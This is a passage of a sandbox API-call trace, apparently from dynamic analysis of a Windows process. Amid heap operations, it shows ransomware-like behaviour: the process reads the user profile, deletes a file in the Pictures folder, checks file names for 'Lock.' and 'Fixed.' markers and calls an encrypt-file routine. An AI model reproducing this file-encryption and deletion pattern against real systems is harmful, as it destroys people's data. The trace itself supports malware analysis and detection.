RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0252.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0252.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0252.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0252.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0252.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.402] CloseHandle (hObject=0x2a0) returned 1 [0252.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0252.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0252.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0252.408] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0252.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0252.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0252.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0252.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0252.414] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0252.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0252.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0252.414] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0252.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0252.415] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/q0Ayv.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\q0Ayv.png", lpFilePart=0x8cedf4*="q0Ayv.png") returned 0x22 [0252.415] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\q0Ayv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\q0ayv.png")) returned 0x20 [0252.415] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\q0Ayv.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ef4830, ftCreationTime.dwHighDateTime=0x1d5f07f, ftLastAccessTime.dwLowDateTime=0xeef15e10, ftLastAccessTime.dwHighDateTime=0x1d5ec42, ftLastWriteTime.dwLowDateTime=0xeef15e10, ftLastWriteTime.dwHighDateTime=0x1d5ec42, nFileSizeHigh=0x0, nFileSizeLow=0xb42a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="q0Ayv.png", cAlternateFileName="")) returned 0xa87310 [0252.416] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\q0Ayv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\q0ayv.png")) returned 1 [0252.417] FindNextFileW (in: hFindFile=0xa87310, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ef4830, ftCreationTime.dwHighDateTime=0x1d5f07f, ftLastAccessTime.dwLowDateTime=0xeef15e10, ftLastAccessTime.dwHighDateTime=0x1d5ec42, ftLastWriteTime.dwLowDateTime=0xeef15e10, ftLastWriteTime.dwHighDateTime=0x1d5ec42, nFileSizeHigh=0x0, nFileSizeLow=0xb42a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="q0Ayv.png", cAlternateFileName="")) returned 0 [0252.418] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0252.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0252.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0252.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0252.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0252.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0252.418] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0252.418] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0252.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0252.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x46) returned 0x2e58910 [0252.419] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/q0Ayv.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\q0Ayv.png", lpFilePart=0x8cf650*="q0Ayv.png") returned 0x22 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0252.419] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\q0Ayv.png" (normalized: "c:\\users\\fd1hvy\\pictures\\q0ayv.png")) returned 0xffffffff [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0252.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0252.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0252.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.420] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0252.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0252.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0252.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWfcb.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wfcb.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0252.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fcb.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cb.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0252.421] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0252.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0252.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0252.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWfcb.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wfcb.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0252.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fcb.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cb.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0252.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0252.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0252.423] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0252.423] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0252.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d58 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.423] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0252.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0252.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0252.424] RtlAllocateHeap 